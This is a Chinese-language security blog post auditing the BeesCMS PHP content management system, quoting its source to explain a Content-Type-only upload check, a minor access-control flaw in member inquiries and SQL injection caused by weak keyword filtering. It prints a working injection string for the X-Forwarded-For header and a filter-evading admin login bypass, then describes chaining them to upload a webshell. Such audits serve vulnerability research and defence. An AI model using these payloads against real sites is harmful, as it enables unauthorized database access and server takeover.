<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.4.2" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.4.2">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/noel.png?v=6.4.2">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/noel.png?v=6.4.2">


  <link rel="mask-icon" href="/images/logo.svg?v=6.4.2" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.4.2',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="挺简单一套CMS，找SQL注入的时候脑残了">
<meta name="keywords" content="Web,PHP">
<meta property="og:type" content="article">
<meta property="og:title" content="BeesCMS 代码审计">
<meta property="og:url" content="http://yoursite.com/2019/03/30/bees/index.html">
<meta property="og:site_name" content="Noel&#39;s Blog">
<meta property="og:description" content="挺简单一套CMS，找SQL注入的时候脑残了">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2019/03/30/bees/upload1.png">
<meta property="og:image" content="http://yoursite.com/2019/03/30/bees/sql1.png">
<meta property="og:updated_time" content="2019-03-30T14:57:44.593Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="BeesCMS 代码审计">
<meta name="twitter:description" content="挺简单一套CMS，找SQL注入的时候脑残了">
<meta name="twitter:image" content="http://yoursite.com/2019/03/30/bees/upload1.png">



  <link rel="alternate" href="/atom.xml" title="Noel's Blog" type="application/atom+xml">




  <link rel="canonical" href="http://yoursite.com/2019/03/30/bees/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>BeesCMS 代码审计 | Noel's Blog</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Noel's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/30/bees/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Noel">
      <meta itemprop="description" content="I love u">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Noel's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">BeesCMS 代码审计
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-03-30 00:00:00 / 修改时间：22:57:44" itemprop="dateCreated datePublished" datetime="2019-03-30T00:00:00+08:00">2019-03-30</time>
            

            
              

              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/代码审计/" itemprop="url" rel="index"><span itemprop="name">代码审计</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><font color="green">挺简单一套CMS，找SQL注入的时候脑残了</font><br><a id="more"></a></p>
<h3 id="后台直接上传WebShell"><a href="#后台直接上传WebShell" class="headerlink" title="后台直接上传WebShell"></a>后台直接上传WebShell</h3><p>漏洞位于/admin/admin_pic_upload.php</p>
<p>直接看上传相关的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(is_uploaded_file($v))&#123;</span><br><span class="line">		$pic_info[<span class="string">'tmp_name'</span>]=$v;</span><br><span class="line">		$pic_info[<span class="string">'size'</span>]=$_FILES[<span class="string">'up'</span>][<span class="string">'size'</span>][$k];</span><br><span class="line">		$pic_info[<span class="string">'type'</span>]=$_FILES[<span class="string">'up'</span>][<span class="string">'type'</span>][$k];</span><br><span class="line">		$pic_info[<span class="string">'name'</span>]=$_FILES[<span class="string">'up'</span>][<span class="string">'name'</span>][$k];</span><br><span class="line">		$pic_name_alt=<span class="keyword">empty</span>($is_alt)?<span class="string">''</span>:$pic_alt[$k];</span><br><span class="line">		$is_up_size = $_sys[<span class="string">'upload_size'</span>]*<span class="number">1000</span>*<span class="number">1000</span>;</span><br><span class="line">		$value_arr=up_img($pic_info,$is_up_size,<span class="keyword">array</span>(<span class="string">'image/gif'</span>,<span class="string">'image/jpeg'</span>,<span class="string">'image/png'</span>,<span class="string">'image/jpg'</span>,<span class="string">'image/bmp'</span>,<span class="string">'image/pjpeg'</span>,<span class="string">'image/x-png'</span>),$up_is_thumb,$up_thumb_width,$up_thumb_height,$logo=<span class="number">1</span>,$pic_name_alt);</span><br><span class="line">		<span class="comment">//处理上传后的图片信息</span></span><br><span class="line">		$pic_name=$value_arr[<span class="string">'up_pic_name'</span>];<span class="comment">//图片名称空</span></span><br><span class="line">		$pic_ext=$value_arr[<span class="string">'up_pic_ext'</span>];<span class="comment">//图片扩展名</span></span><br><span class="line">		$pic_title = $pic_alt[$k];<span class="comment">//图片描述</span></span><br><span class="line">		$pic_size = $value_arr[<span class="string">'up_pic_size'</span>];<span class="comment">//图片大小</span></span><br><span class="line">		$pic_path = $value_arr[<span class="string">'up_pic_path'</span>];<span class="comment">//上传路径</span></span><br><span class="line">		$pic_time = $value_arr[<span class="string">'up_pic_time'</span>];<span class="comment">//上传时间</span></span><br><span class="line">		$pic_thumb = iconv(<span class="string">'GBK'</span>,<span class="string">'UTF-8'</span>,$value_arr[<span class="string">'thumb'</span>]);<span class="comment">//缩略图</span></span><br><span class="line">		$cate = <span class="keyword">empty</span>($pic_cate)?<span class="number">1</span>:$pic_cate;<span class="comment">//图片栏目</span></span><br><span class="line">		<span class="comment">//入库</span></span><br><span class="line">$sql=<span class="string">"insert into "</span>.DB_PRE.<span class="string">"uppics (pic_name,pic_ext,pic_alt,pic_size,pic_path,pic_time,pic_thumb,pic_cate) values ('"</span>.$pic_name.<span class="string">"','"</span>.$pic_ext.<span class="string">"','"</span>.$pic_title.<span class="string">"','"</span>.$pic_size.<span class="string">"','"</span>.$pic_path.<span class="string">"','"</span>.$pic_time.<span class="string">"','"</span>.$pic_thumb.<span class="string">"',"</span>.$cate.<span class="string">")"</span>;</span><br><span class="line">$mysql-&gt;query($sql);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>up_img函数用来判断文件类型，原函数为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">up_img($file,$size,$type,$thumb=<span class="number">0</span>,$thumb_width=<span class="string">''</span>,$thumb_height=<span class="string">''</span>,$logo=<span class="number">1</span>,$pic_alt=<span class="string">''</span>)</span><br></pre></td></tr></table></figure>
<p>这里的type很明显是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span>(<span class="string">'image/gif'</span>,<span class="string">'image/jpeg'</span>,<span class="string">'image/png'</span>,<span class="string">'image/jpg'</span>,<span class="string">'image/bmp'</span>,<span class="string">'image/pjpeg'</span>,<span class="string">'image/x-png'</span>)</span><br></pre></td></tr></table></figure>
<p>这一串，也就是说这是一个只检测Content-Type的函数</p>
<p><img src="/2019/03/30/bees/upload1.png" alt></p>
<p>轻松搞定</p>
<h3 id="用户咨询鸡肋越权"><a href="#用户咨询鸡肋越权" class="headerlink" title="用户咨询鸡肋越权"></a>用户咨询鸡肋越权</h3><p>/member/member.php</p>
<p>看修改咨询处代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">......</span><br><span class="line">	$id=intval(fl_value($_GET[<span class="string">'id'</span>]));</span><br><span class="line">	$member_id=intval(fl_value($_GET[<span class="string">'member_id'</span>]));</span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">empty</span>($id))&#123;<span class="keyword">die</span>(<span class="string">"&lt;script type=\"text/javascript\"&gt;alert('&#123;$language['msg_info10']&#125;');history.go(-1);&lt;/script&gt;"</span>);&#125;</span><br><span class="line">	$sql=<span class="string">"select*from "</span>.DB_PRE.<span class="string">"ask where id=&#123;$id&#125; and member=&#123;$member_id&#125;"</span>;</span><br><span class="line">......</span><br></pre></td></tr></table></figure>
<p>只要知道id以及咨询的id即可得知别人的咨询，当然也可以通过遍历，并没什么卵用</p>
<h3 id="产品购买处存在SQL注入"><a href="#产品购买处存在SQL注入" class="headerlink" title="产品购买处存在SQL注入"></a>产品购买处存在SQL注入</h3><p>/mx_form/order_save.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$addtime=time();</span><br><span class="line">$ip=fl_value(get_ip());</span><br><span class="line">$ip=fl_html($ip);</span><br><span class="line">$member_id=<span class="keyword">empty</span>($_SESSION[<span class="string">'id'</span>])?<span class="number">0</span>:$_SESSION[<span class="string">'id'</span>];</span><br><span class="line">$arc_id=<span class="keyword">empty</span>($f_id)?<span class="number">0</span>:intval($_POST[<span class="string">'f_id'</span>]);</span><br><span class="line">$sql=<span class="string">"insert into "</span>.DB_PRE.<span class="string">"formlist (form_id,form_time,form_ip,member_id,arc_id) values (&#123;$form_id&#125;,&#123;$addtime&#125;,'&#123;$ip&#125;','&#123;$member_id&#125;','&#123;$arc_id&#125;')"</span>;</span><br><span class="line">$mysql-&gt;query($sql);</span><br></pre></td></tr></table></figure>
<p>IP经过fl_value以及fl_html处理</p>
<p>先来看下fl_value</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">fl_value</span><span class="params">($str)</span></span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">empty</span>($str))&#123;<span class="keyword">return</span>;&#125;</span><br><span class="line">	<span class="keyword">return</span> preg_replace(<span class="string">'/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file</span></span><br><span class="line"><span class="string">|outfile/i'</span>,<span class="string">''</span>,$str);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看出有许多问题，首先是将一些敏感字符替换为空，替换为空，替换为空！！！</p>
<p>问题似乎很简单了</p>
<p>再来看下fl_html</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">fl_html</span><span class="params">($str)</span></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> htmlspecialchars($str);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里使用了htmlspecialchars进行转义，那么这又是何方神圣呢</p>
<p>看下官方解释</p>
<table>
<thead>
<tr>
<th style="text-align:left">字符</th>
<th style="text-align:left">替换后</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left"><em>&amp;</em> (&amp; 符号)</td>
<td style="text-align:left"><em>&amp;</em></td>
</tr>
<tr>
<td style="text-align:left"><em>“</em> (双引号)</td>
<td style="text-align:left"><em>&quot;</em>，除非设置了 <strong>ENT_NOQUOTES</strong></td>
</tr>
<tr>
<td style="text-align:left"><em>‘</em> (单引号)</td>
<td style="text-align:left">设置了 <strong>ENT_QUOTES</strong> 后， <em>&#039;</em> (如果是 <strong>ENT_HTML401</strong>) ，或者 <em>&apos;</em> (如果是 <strong>ENT_XML1</strong>、 <strong>ENT_XHTML</strong> 或 <strong>ENT_HTML5</strong>)。</td>
</tr>
<tr>
<td style="text-align:left"><em>&lt;</em> (小于)</td>
<td style="text-align:left"><em>&lt;</em></td>
</tr>
<tr>
<td style="text-align:left"><em>&gt;</em> (大于)</td>
<td style="text-align:left"><em>&gt;</em></td>
</tr>
</tbody>
</table>
<p>其作用是将一些敏感字符替换掉，那么注意了，这里之说当指定了ENT_QUOTES后单引号才会被替换！！！</p>
<p>看来这两个函数对我们并没有什么影响了呢</p>
<p>在购买处填写好消息，然后提交</p>
<p>增加X-Forwarded-For</p>
<p><code>X-Forwarded-For: lalala&#39;,&#39;0&#39;,&#39;&#39; or updatexml(1,concat(0x7e,user(),0x7e),1))#</code></p>
<p><img src="/2019/03/30/bees/sql1.png" alt></p>
<p>该CMS基本上都是采用这两个函数进行过滤，也就是说，这个CMS到处是注入！！</p>
<p>后台处：</p>
<p>账号:’ unselection selselectect 1,2,md5(3),4,0#</p>
<p>密码:3</p>
<p>可以直接登陆后台</p>
<p>进入后台利用上传处漏洞可GETSHELL</p>
<blockquote>
<p>我愿千金散尽只为赠你火树银花；我愿点亮夜空只为你灿烂一笑。</p>
</blockquote>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
          
            <a href="/tags/PHP/" rel="tag"><i class="fa fa-tag"></i> PHP</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/21/subdomin/" rel="next" title="Subdomain Collect Plan">
                <i class="fa fa-chevron-left"></i> Subdomain Collect Plan
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/31/xssworm/" rel="prev" title="XSSWORM">
                XSSWORM <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Noel</p>
              <p class="site-description motion-element" itemprop="description">I love u</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">41</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">16</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">16</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://norw1nd.github.io/" title="Norw1nd" target="_blank">Norw1nd</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://Xvgeng.github.io/" title="Xvgeng" target="_blank">Xvgeng</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://patrilic.top/" title="Patrilic" target="_blank">Patrilic</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://sayhi2urmom.top/" title="sayhi" target="_blank">sayhi</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#后台直接上传WebShell"><span class="nav-number">1.</span> <span class="nav-text">后台直接上传WebShell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#用户咨询鸡肋越权"><span class="nav-number">2.</span> <span class="nav-text">用户咨询鸡肋越权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#产品购买处存在SQL注入"><span class="nav-number">3.</span> <span class="nav-text">产品购买处存在SQL注入</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Noel</span>

  

  
</div>




  <div class="powered-by"><!--
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>-->
  <!--<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.4.2</div>-->



</div>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.4.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.4.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.4.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.4.2"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.4.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.4.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.2"></script>



  



  










  





  

  

  

  

  
  

  

  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
